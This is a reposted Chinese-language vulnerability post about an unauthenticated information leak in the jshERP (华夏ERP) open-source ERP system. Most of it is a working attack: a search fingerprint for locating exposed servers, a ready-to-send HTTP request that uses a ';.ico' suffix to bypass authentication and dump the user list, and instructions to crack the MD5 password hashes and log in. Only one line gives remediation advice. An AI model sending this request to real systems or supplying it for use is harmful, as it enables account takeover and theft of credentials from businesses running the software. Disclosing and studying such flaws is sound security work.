华夏ERP getAllList;.ico敏感信息泄露漏洞

发布时间:2023年12月22日

漏洞描述

华夏ERP是基于SpringBoot框架和SaaS模式,立志为中小企业提供开源好用的ERP软件,目前专注进销存+财务功能。主要模块有零售管理、采购管理、销售管理、仓库管理、财务管理、报表查询、系统管理等。支持预付款、收入支出、仓库调拨、组装拆卸、订单等特色功能。拥有库存状况、出入库统计等报表。同时对角色和权限进行了细致全面控制,精确到每个按钮和菜单。该系统存在信息泄露漏洞,可以获取到系统的账号密码。

资产测绘

body=“jshERP-boot”

漏洞影响

开源ERP系统jshERP所有版本
在这里插入图片描述

漏洞复现

POC:

GET /jshERP-boot/user/getAllList;.ico HTTP/1.1
Host: your_ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


在这里插入图片描述
将password的值进行md5解密为明文,即可登录
在这里插入图片描述
在这里插入图片描述

修复建议

对相关接口进行限制访问、鉴权。

文章来源:https://blog.csdn.net/qq_36618918/article/details/135152304
本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。